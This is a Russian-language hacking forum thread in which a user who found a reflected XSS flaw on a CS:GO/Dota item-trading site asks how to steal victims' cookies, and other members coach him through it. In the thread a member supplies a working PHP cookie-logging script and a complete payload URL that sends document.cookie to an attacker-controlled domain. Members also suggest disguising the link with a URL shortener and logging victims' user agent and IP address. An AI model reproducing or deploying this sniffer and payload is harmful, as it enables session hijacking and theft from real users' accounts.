Опять насчёт xss .

Discussion in 'Песочница' started by SaNDER, 3 Aug 2015.

  1. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Я нашёл XSS уязвимость срабатывает при вводе скрипта и его отправки в саппорт .
    А как XSS на линку повесить тогда?Что бы когда жертва переходила по линке xss срабатывала и куки приходили на сниффер .
    Кстати кому надо могу в личку xss слить она от ксго сайта + дота .

    + Нашёл ещё xss в поиске . Точнее в поиске игроков .
    При вводе "><script>alert()</script> появляется пустое окно,в поиске игроков за место моего скрипта,появляется \ . + меняется ссылка,туда этот скрипт вбился . Это пассив или актив ? .

    И как чёрт подери повесить xss на сниффер,у меня снифф онлайн hackerlab .
     
    #1 SaNDER, 3 Aug 2015
    Last edited: 3 Aug 2015
  2. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    Скорее всего XSS твоя в POST параметре) Тоже вещь опасная.. Где то видил тут тему создавали про POST XSS, поищи на форуме.
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Это вы геев так будете классифицировать.

    А XSS может быть:

    1) Stored (persistent)
    2) Reflected
    3) DOM-based
    4) Self-xss

    У вас скорее всего тип Reflected.
     
    _________________________
    equal, randman, banned and 2 others like this.
  4. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Reflected - перевод можно ?
     
  5. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    а как узнать в пост она параметре или нет ?,



    Чисто для инфы . Сайт продажа/покупка вещей кс го + ещё один сайт для доты(все также токо для доты),переход по сайтам через кнопочку . Авторизация на сайт через стим .
    Покупка через стим трейд .
    Защита HTTPS .
     
  6. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Отражённые (Непостоянные)
    Атака, основанная на отражённой уязвимости, на сегодняшний день является самой распространенной XSS-атакой.Эти уязвимости появляются, когда данные, предоставленные веб-клиентом, чаще всего в параметрах HTTP-запроса или в форме HTML, исполняются непосредственно серверными скриптами для синтаксического анализа и отображения страницы результатов для этого клиента, без надлежащей обработки. Отражённая XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке.

    Пример:
    http://example.com/search.php?q=<script>DoSomething();</script>
    Если сайт не экранирует угловые скобки, преобразуя их в «&lt;» и «&gt;», получим скрипт на странице результатов поиска.

    Отражённые атаки, как правило, рассылаются по электронной почте или размещаются на Web-странице. URL приманки не вызывает подозрения, указывая на надёжный сайт, но содержит вектор XSS. Если доверенный сайт уязвим к вектору XSS, то переход по ссылке может привести к тому, что браузер жертвы начнет выполнять встроенный скрипт.
     
    _________________________
  7. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    Для начала почитай что такое POST.
     
  8. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Мне нужен сниффер,в котором я могу вставить свою волшебную xss-ссылочку . И ещё,я как понял он ворует кукисы,а в кукисах хэш и если его расшифровать можно получить пароль ? .
     
  9. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Ну ведь скрипт в линке пошёл после "?" знака - смотрите сами ******.net/players/?st="><script>alert()<%2Fscript>
     
  10. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    Я ж тебе сказал, поройся в гугле и почитай про пост. Если твоя XSS в посте, ссылочку ты уже не подставишь. Например, данные с полей для входа в админку идут пост параметром. Получается что-то типа того:
    POST /admin.php
    ...
    HTTP-HEADERS
    ...
    login=<script>alert(1)</script>&password=pass.
    Обычный переход по ссылке это GET. Что бы раскрутить твою XSS'ку в посте, нужно заманить жертву на твой сайт, а оттуда можно уже будет отправить POST запрос на уязвимый сайт.
     
  11. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Мне нужен снифф где я могу за место стандартной ссылочке подставить свою,наверное это нужно или можно любую?.
     
  12. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    А сниффер тут причем? Пользуйся тем чем пользовался.
     
  13. spiner

    spiner Member

    Joined:
    8 Jul 2015
    Messages:
    74
    Likes Received:
    56
    Reputations:
    4
    PHP:
    <?php
      $cookies 
    $_GET['cookies'];
      if (
    $cookiesfile_put_contents('cookies.txt'$cookies."\r\n"FILE_APPEND);
      
    Header('Location: pict.jpg'301);
    ?>
    сохраняешь код выше в файл snif.php и заливаешь на хостинг, вместе с какой-нибудь картинкой с именем pict.jpg. допустим, твой домен mysnif.ru. тогда ссылка твоя будет вида:
    ******.net/players/?st="><script>window.location.href='http://mysnif.ru/snif.php?cookies='+document.cookie;</script>
    Куки будут записаны в файл cookies.txt. Также неплохо бы еще записывать User-Agent и IP, при необходимости допилишь сам
     
    SaNDER likes this.
  14. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Cлушай,а жертва должна быть зарегена на сайте в котором xss? .

    Я PHP не знаю,но код я составил так .
    <?php
    $cookies = $_GET['cookies'];
    if ($cookies) file_put_contents('cookies.txt', $cookies."\r\n", FILE_APPEND);
    Header('Location: pict.jpg', 301);
    ?>
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,"http://..");
    curl_setopt($ch, CURLOPT_HEADER, 0); //
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    $result = curl_exec ($ch);
    curl_close ($ch);

    У меня сервер на Hostinger.ru,как сделать так что при открытий сайта переходило на
    xss ?
     
    #14 SaNDER, 3 Aug 2015
    Last edited: 3 Aug 2015
  15. spiner

    spiner Member

    Joined:
    8 Jul 2015
    Messages:
    74
    Likes Received:
    56
    Reputations:
    4
    что-то я не пойму, что ты хочешь сделать... жертве тебе нужно подсунуть ссылку, которую я приводил выше (лучше воспользоваться какой-нибудь сокращалкой). когда жертва по ней перейдет, ее будет перенаправлено на твой скрипт (сниффер), предварительно подставив куки в качестве параметров, откуда сниффер их возьмет и запишет в файл. жертва естественно должна быть зарегана на сайте, иначе нету смысла п*здить у нее куки.
     
  16. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Токо ты не ответил.а допилил я правильно по поводу user agent ?
     
  17. spiner

    spiner Member

    Joined:
    8 Jul 2015
    Messages:
    74
    Likes Received:
    56
    Reputations:
    4
    нет. ты подготавливаешь какой-то запрос на курл, а тебе нужно получить юзерагент пользователя, посетившего твой скрипт. храниться он в массиве $_SERVER, там же и айпи клиента:
    $_SERVER['HTTP_USER_AGENT']
    $_SERVER['REMOTE_ADDR']
     
  18. PHPussy

    PHPussy Member

    Joined:
    31 Jul 2015
    Messages:
    18
    Likes Received:
    9
    Reputations:
    0
    и куки $_SERVER[' HTTP_COOKIE']
     
  19. spiner

    spiner Member

    Joined:
    8 Jul 2015
    Messages:
    74
    Likes Received:
    56
    Reputations:
    4
    а куки то ему зачем?) если он их не выставит, то значение все равно будет пустым)) куки от сайта донора передаются в гет параметрах
     
  20. PHPussy

    PHPussy Member

    Joined:
    31 Jul 2015
    Messages:
    18
    Likes Received:
    9
    Reputations:
    0
    я про пхпинжект